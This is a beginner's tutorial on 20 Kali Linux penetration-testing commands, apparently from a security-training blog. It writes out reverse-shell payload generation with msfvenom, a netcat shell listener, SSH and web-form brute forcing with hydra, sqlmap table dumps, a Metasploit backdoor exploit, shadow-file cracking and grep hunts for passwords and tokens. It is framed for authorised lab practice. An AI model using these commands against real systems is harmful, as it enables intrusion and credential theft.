Top 20 Kali Linux Commands Every Hacker Must Know (2026)

Top 20 Kali Linux Commands
Top 20 Kali Linux Commands
Update By HOC Team  |  Last updated: June 26, 2026  |  Read time: ~18 min

Whether you just installed Kali Linux for the first time or you are preparing for your OSCP exam, knowing the right commands is what separates someone who has a hacking OS from someone who can actually use it. This guide covers the 20 most essential Kali Linux commands every ethical hacker relies on — each explained in plain English, with real syntax, real examples, and pro tips you won’t find in a man page.

At the end you’ll find a complete quick-reference cheatsheet. Jump straight to the cheatsheet →

Prerequisites — what you need before starting
  • Kali Linux installed — VirtualBox VM, VMware, or native install. Not set up yet? See our Kali Linux install guide.
  • A legal practice target — DVWA, Metasploitable 2, or a TryHackMe/HackTheBox room. Never point these tools at live systems without written permission.
  • Basic Linux navigation — you know how to open a terminal, use ls, cd, and sudo.
💡 Fastest legal practice target Sign up for TryHackMe (free tier) and start a beginner room. It spins up a vulnerable machine in under 60 seconds — no VM setup needed.
1. Recon commands — gather intelligence before you attack

Reconnaissance is always Phase 1 of any penetration test. You cannot attack what you cannot see. These six commands form the complete recon toolkit — from port discovery to web server vulnerability scanning.

1
nmap — the king of port scanners
Recon

Nmap discovers live hosts, open ports, running services, version numbers, and operating systems. Every pentest starts here.

Syntax
nmap [options]
Three essential scans
# 1. Service + version detection (best starting point) nmap -sV -sC 192.168.1.10 # 2. Aggressive — OS detection, scripts, traceroute nmap -A -T4 192.168.1.10 # 3. Full port scan — all 65535 ports nmap -p- 192.168.1.10
Sample output
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9 80/tcp open http Apache httpd 2.4.38 3306/tcp open mysql MySQL 5.7.30
Pro tip: Always start with -sV -sC — the -sC flag runs Nmap’s default scripts which instantly reveal misconfigurations. Use -T4 on local lab networks for speed, drop to -T2 on remote targets.
2
whois — find out who owns a domain
Recon

Queries domain registration databases to reveal the owner, registrar, name servers, and contact emails. First OSINT step when starting from a domain name.

Syntax & Example
whois example.com Domain Name: EXAMPLE.COM Registrar: IANA Creation Date: 1995-08-14 Name Server: A.IANA-SERVERS.NET
Pro tip: Run whois on the IP address too — you’ll get the ASN and hosting provider, revealing the full network range in scope for your engagement.
3
dig / nslookup — DNS enumeration
Recon

Queries DNS records to reveal A records, MX mail servers, TXT records, and subdomains. A zone transfer attempt can dump the entire DNS map of a target in one command.

Key examples
# Get all DNS records dig ANY example.com # DNS zone transfer attempt (reveals all subdomains if misconfigured) dig axfr example.com @ns1.example.com
Pro tip: Zone transfers (axfr) are a classic misconfiguration — if not locked down, one command dumps every hostname and IP in the zone. Always try it.
4
theHarvester — email and subdomain OSINT
Recon

Searches public data sources (Google, Bing, LinkedIn, Shodan) to harvest emails, employee names, and subdomains — all without touching the target directly.

Key examples
# Search Google and LinkedIn theHarvester -d targetcompany.com -b google,linkedin # Use all available sources theHarvester -d targetcompany.com -b all
Pro tip: Combine harvested email addresses with linkedin2username to build a username wordlist for Hydra password spraying attacks.
5
gobuster — brute force web directories and subdomains
Recon

Brute-forces hidden directories, backup files, and subdomains using a wordlist. Significantly faster than dirb because it runs concurrent threads.

Key examples
# Directory brute force gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt # Include file extensions (finds backups, config files) gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,bak
Pro tip: Install SecLists for better wordlists: apt-get install seclists. The built-in dirb/common.txt is a fast starter but SecLists is far more comprehensive.
6
nikto — automated web server vulnerability scanner
Recon

Scans a web server for 6,700+ known vulnerabilities, dangerous files, outdated software, and misconfigurations. Fast but noisy — easily detected by IDS/IPS.

Syntax & Example
# Basic scan nikto -h http://192.168.1.10 # Save output to file for your report nikto -h http://192.168.1.10 -o nikto-results.txt
Pro tip: Nikto is intentionally loud — not a stealth tool. On CTFs and authorised tests always run it. For red team engagements where detection matters, skip it or use passive techniques instead.
2. Networking commands — monitor, intercept, and pivot

After recon, you need to understand the network you are operating in. These five commands let you monitor connections, catch shells, capture packets, and discover every live host on a LAN.

7
netstat — see every open port and active connection
Networking

Displays active connections, listening ports, and routing information. Answers the question: what is running and accepting connections on this machine right now?

The one command to remember
# Show all listening TCP/UDP ports with PID netstat -tulnp Proto Local Address State PID/Program tcp 0.0.0.0:22 LISTEN 1023/sshd tcp 0.0.0.0:80 LISTEN 887/apache2 tcp 0.0.0.0:3306 LISTEN 1145/mysqld # Modern replacement on Kali 2023+ ss -tulnp
Pro tip — flag breakdown: -t TCP | -u UDP | -l listening | -n numeric | -p show PID. Use ss -tulnp on newer Kali — it’s faster.
8
ifconfig / ip a — read your network interfaces
Networking

Shows your IP address, interface, and subnet. You need this before running any network command — your IP is your LHOST in every reverse shell payload.

Commands
# Modern (preferred on Kali 2022+) ip a # Classic — still works everywhere ifconfig
Pro tip: Always run ip a before generating any msfvenom payload — getting LHOST wrong is the #1 reason reverse shells fail in labs.
9
netcat (nc) — the hacker’s Swiss Army knife
Networking

Reads and writes raw data across TCP/UDP connections. Used for catching reverse shells, banner grabbing, port scanning, and file transfers. Learning netcat is non-negotiable.

Two essential use cases
# Banner grabbing — identify a service nc -v 192.168.1.10 80 Connection to 192.168.1.10 80 succeeded! Apache/2.4.38 (Debian) Server # Reverse shell listener — run this FIRST on your Kali box nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received from 192.168.1.20…
Pro tip — flag breakdown: -l listen | -v verbose | -n no DNS | -p 4444 port. In real engagements use port 443 or 80 — blends into normal traffic and less likely to be blocked by firewalls.
10
tcpdump — capture packets from the command line
Networking

CLI packet analyser — essential when on a remote system with no GUI. Saves captures as .pcap files you can open in Wireshark later.

Key examples
# Capture HTTP and save to file tcpdump -i eth0 tcp port 80 -w capture.pcap # Read saved capture tcpdump -r capture.pcap # Filter by host and print content (catch plaintext passwords) tcpdump -A -i eth0 host 192.168.1.10 | grep -i “pass”
Pro tip: The -A flag prints packet content as ASCII — immediately useful for intercepting unencrypted credentials sent over HTTP, FTP, or Telnet on authorised lab networks.
11
arp-scan — discover every live host on your LAN
Networking

Sends ARP packets to every address on a subnet and reports which hosts respond. Faster and more reliable than Nmap ping sweep for local discovery — ARP cannot be blocked by a firewall.

Example
arp-scan -l 192.168.1.1 00:1a:2b:3c:4d:5e Cisco Systems, Inc. 192.168.1.10 aa:bb:cc:dd:ee:ff VMware, Inc. 192.168.1.20 11:22:33:44:55:66 Unknown
Pro tip: The vendor column from the MAC OUI tells you what each device is — routers, printers, phones, VMs. A VMware MAC almost certainly means another VM on the same hypervisor as yours.
3. Exploitation commands — from vulnerability to shell
⚠️ Legal reminder The commands in this section perform active exploitation. Only run them against systems you own or have written authorisation to test. All examples use Metasploitable 2 and DVWA.
12
msfconsole — launch the Metasploit Framework
Exploitation

Metasploit is the world’s most widely used penetration testing platform — thousands of exploits, payloads, and post-exploitation modules. msfconsole is its CLI interface.

Core workflow
# Launch msfconsole # Search for an exploit msf6 > search type:exploit name:vsftpd # Select and configure msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 > set RHOSTS 192.168.1.20 msf6 > run [+] Backdoor service spawned [*] Command shell session 1 opened
Pro tip: Use db_nmap -sV 192.168.1.0/24 inside msfconsole to run Nmap and auto-import results into Metasploit’s database — then run vulns to see what it already knows about your targets.
13
searchsploit — search Exploit-DB offline
Exploitation

CLI tool for the Exploit-DB archive. Works completely offline — critical in network-isolated pentest environments. Found exploits can be copied directly to your working directory.

Key examples
# Search by service name searchsploit apache 2.4 # Search by CVE searchsploit CVE-2021-41773 # Copy exploit to working directory searchsploit -m exploits/linux/remote/49765.py
Pro tip: Update before every engagement: searchsploit –update. The Exploit-DB adds new entries daily.
14
sqlmap — automated SQL injection
Exploitation

Automates detection and exploitation of SQL injection vulnerabilities — identifies injection type, enumerates databases, dumps tables, and in some cases gains OS access.

Key examples (on DVWA — legal practice)
# Basic injection test sqlmap -u “http://192.168.1.10/dvwa/?id=1&Submit=Submit” –cookie=”security=low” # Enumerate all databases sqlmap -u “…” –dbs # Dump a specific table sqlmap -u “…” -D dvwa -T users –dump
Pro tip: Add –level=3 –risk=2 if basic scan misses an injection. Run through Burp Suite (–proxy=http://127.0.0.1:8080) during real engagements for a full HTTP history for your report.
15
msfvenom — generate custom payloads
Exploitation

Generates standalone reverse shell payloads for any platform — Windows EXE, Linux ELF, PHP shells, Python scripts, and more. Pairs with a Metasploit listener to catch the shell.

Key examples
# Windows reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o shell.exe # Linux ELF binary msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf -o shell.elf # PHP web shell msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f raw -o shell.php
Pro tip: Always start your Metasploit listener before executing the payload on the target. In msfconsole: use exploit/multi/handler → set same PAYLOAD, LHOST, LPORT → run.
4. Password attack commands — crack hashes and brute force logins

Weak passwords remain the most common attack vector in pentesting. These three tools cover the full spectrum: online brute force against live services, offline CPU cracking, and GPU-accelerated cracking.

16
hydra — brute force any login service
Password

Fast, parallelised online password cracker supporting 50+ protocols — SSH, FTP, HTTP forms, RDP, SMB, MySQL. Takes a username and wordlist and tries every combination.

Two most useful examples
# SSH brute force hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.20 ssh # HTTP POST login form brute force hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 http-post-form “/login.php:user=^USER^&pass=^PASS^:Invalid” # Multiple usernames, limit threads to avoid lockout hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.20 ssh
Pro tip — unzip rockyou first: gunzip /usr/share/wordlists/rockyou.txt.gz
Use -t 4 (4 threads) for SSH to avoid triggering account lockout policies on real systems.
17
john — crack password hashes with wordlists
Password

John the Ripper cracks offline password hashes from /etc/shadow, database dumps, or captured NTLM hashes. Auto-detects hash format. Best for small-to-medium hash counts.

Key examples
# Wordlist attack (auto-detects format) john –wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # Force specific format john –format=md5crypt –wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # Show cracked passwords john –show hashes.txt # Combine shadow + passwd file then crack unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt
John vs Hashcat: Use John for small hash sets and auto-detection. Switch to Hashcat for large batches — GPU acceleration is 10–100× faster on intensive workloads.
18
hashcat — GPU-accelerated hash cracking
Password

World’s fastest password recovery tool. Leverages GPU to crack billions of hashes per second. Supports 300+ hash types. Use for large-scale cracking jobs.

Common hash modes (-m)
# -m 0 = MD5 # -m 100 = SHA1 # -m 1000 = NTLM (Windows) # -m 1800 = sha512crypt (Linux /etc/shadow) # -m 3200 = bcrypt
Key examples
# Crack NTLM hashes with rockyou.txt hashcat -m 1000 -a 0 ntlm-hashes.txt /usr/share/wordlists/rockyou.txt # Add mutation rules (Password1 → password123! etc.) hashcat -m 1000 -a 0 ntlm-hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule # Show cracked results hashcat -m 1000 ntlm-hashes.txt –show
Pro tip: Always apply best64.rule before moving to raw brute force. It tests 64 common mutations on every wordlist entry and typically cracks 2–3× more passwords for a small time cost.
5. File and system commands every hacker uses daily

These two commands are built into every Linux system — but in a penetration tester’s hands they become privilege escalation and credential-hunting tools.

19
chmod / chown — control file permissions
File & System

chmod changes file permissions; chown changes ownership. Essential for making exploit scripts executable — and for finding SUID misconfigurations during privilege escalation.

Key examples
# Make a script executable (pentester does this constantly) chmod +x exploit.sh chmod 755 exploit.sh # SSH key must be 600 or SSH refuses to use it chmod 600 id_rsa # Find SUID root binaries — privilege escalation goldmine find / -perm -4000 2>/dev/null
Pro tip: Cross-reference SUID binary findings with GTFOBins to instantly see if any can be abused for a root shell — it’s the fastest privilege escalation reference available.
20
grep / find — search files like a pro
File & System

grep searches file content; find searches the filesystem. Combined with hacker-specific patterns, they find credentials and misconfigurations hiding on compromised systems in seconds.

Hacker-specific use cases
# Find plaintext passwords in PHP config files grep -ri “password\|passwd\|secret\|api_key” /var/www/html/ 2>/dev/null # Find world-writable files (misconfiguration hunting) find / -perm -o+w -type f 2>/dev/null # Find files modified in last 10 minutes (post-exploitation) find / -mmin -10 -type f 2>/dev/null # Check bash history for credentials typed previously grep -i “pass\|ssh\|key\|token” ~/.bash_history
Pro tip: The 2>/dev/null at the end suppresses “Permission denied” errors, keeping output clean. On a compromised web server, grep -ri “password” /var/www/ 2>/dev/null regularly reveals database credentials within seconds.
Quick-reference cheatsheet — all 20 commands

Bookmark this section. Every command, category, and core syntax in one table.

#CommandCategoryWhat it does
nmapReconPort scanning, OS & service detectionnmap -sV -sC
whoisReconDomain owner and registration infowhois
digReconDNS record enumeration and zone transfersdig ANY
theHarvesterReconPassive email and subdomain OSINTtheHarvester -d -b google
gobusterReconWeb directory and subdomain brute forcegobuster dir -u -w
niktoReconWeb server vulnerability scannernikto -h
netstatNetworkingShow open ports and active connectionsnetstat -tulnp
ip aNetworkingShow interfaces and IP addressesip a
ncNetworkingBanner grabbing and reverse shell listenernc -lvnp 4444
tcpdumpNetworkingCLI packet capture and analysistcpdump -i eth0 -w out.pcap
arp-scanNetworkingDiscover all live hosts on LAN via ARParp-scan -l
msfconsoleExploitationLaunch Metasploit Frameworkmsfconsole → search → use → run
searchsploitExploitationSearch Exploit-DB offlinesearchsploit
sqlmapExploitationAutomated SQL injection detectionsqlmap -u “” –dbs
msfvenomExploitationGenerate custom reverse shell payloadsmsfvenom -p LHOST=x LPORT=y -f exe
hydraPasswordOnline brute force against live serviceshydra -l admin -P rockyou.txt ssh
johnPasswordOffline CPU hash cracking with wordlistsjohn –wordlist=rockyou.txt hashes.txt
hashcatPasswordGPU-accelerated offline hash crackinghashcat -m 1000 -a 0 hashes.txt wordlist
chmodFile & SystemChange permissions, find SUID binarieschmod +x file / find / -perm -4000
grep/findFile & SystemSearch content and filesystem for credentialsgrep -ri “password” /var/www/
📥 Save this cheatsheet Bookmark this page or use Ctrl+P → Save as PDF for offline reference during CTFs and lab sessions.
How to practise these commands legally
  • DVWA (Damn Vulnerable Web App) — deliberately vulnerable PHP/MySQL web app. Perfect for gobuster, nikto, sqlmap, Burp Suite. Install: apt-get install dvwa
  • Metasploitable 2 — deliberately vulnerable Linux VM with dozens of misconfigured services. Perfect for Nmap, Metasploit, Hydra, John. Download free from SourceForge.
  • TryHackMe — browser-based guided rooms. Free tier includes beginner rooms covering every command in this list. No VM setup needed.
  • HackTheBox — more challenging. Several free “Starting Point” machines are ideal for practising the exploitation section (commands 12–15).
  • VulnHub — downloadable offline vulnerable VMs. Great for building a personal lab with no internet connection.

For a full lab setup guide: How to set up a hacking lab with Kali Linux →

⚡ What to learn next — your learning path

  1. Web application pentesting — now that you know these commands, intercept and manipulate web traffic. Burp Suite tutorial for beginners →
  2. Deep-dive Metasploit — go beyond msfconsole basics: post-exploitation, pivoting, Meterpreter. Full Metasploit tutorial →
  3. Start bug bounty hunting — use these skills on real programs and get paid legally. Bug bounty beginners guide →
  4. Get certified — CEH validates your knowledge; OSCP proves you can actually exploit systems. Both are recognised by employers worldwide.
Frequently asked questions
What are the basic commands in Kali Linux?

The most essential commands fall into four groups: recon (nmap, whois, dig, theHarvester, gobuster, nikto), networking (netstat, netcat, tcpdump, arp-scan), exploitation (msfconsole, searchsploit, sqlmap, msfvenom), and password attacks (hydra, john, hashcat). Start with nmap and work outward.

Which Kali Linux command should I learn first?

Learn nmap first. It is used in every single penetration testing engagement to discover live hosts, open ports, running services, and operating system versions. Every other tool on this list builds on what nmap reveals about your target.

Is it illegal to use Kali Linux commands?

Kali Linux is completely legal to install and use. The commands become illegal only when run against systems you do not own or have explicit written permission to test. Always practise on legal environments such as DVWA, Metasploitable 2, TryHackMe, or HackTheBox.

How long does it take to learn Kali Linux?

Basic navigation and the 20 core commands in this guide can be learned in 1–2 days of focused practice. Becoming proficient enough to run a full penetration test typically takes 2–4 weeks of daily hands-on lab work. CEH and OSCP certifications provide structured 3–6 month learning paths.

What is the difference between John the Ripper and Hashcat?

Both crack offline hashes but use different hardware. John the Ripper uses the CPU and is excellent for automatic hash detection on small datasets. Hashcat uses the GPU and is 10–100× faster for large hash batches. Use John for quick wins; switch to Hashcat for intensive cracking jobs.

What is the most powerful tool in Kali Linux?

Metasploit Framework (launched via msfconsole) is widely regarded as the most powerful tool in Kali Linux. It contains thousands of exploits, payloads, and post-exploitation modules covering every major platform, and is the industry standard used by professional penetration testers worldwide.

Previous Article
Tata Electronics Breached

Tata Electronics Breached: Apple & Tesla Secrets Leaked in Massive Cyberattack!

Next Article
Nmap tutorial beginner to advanced

Nmap Tutorial: Network Scanning From Beginner to Advanced (2026)

Related Posts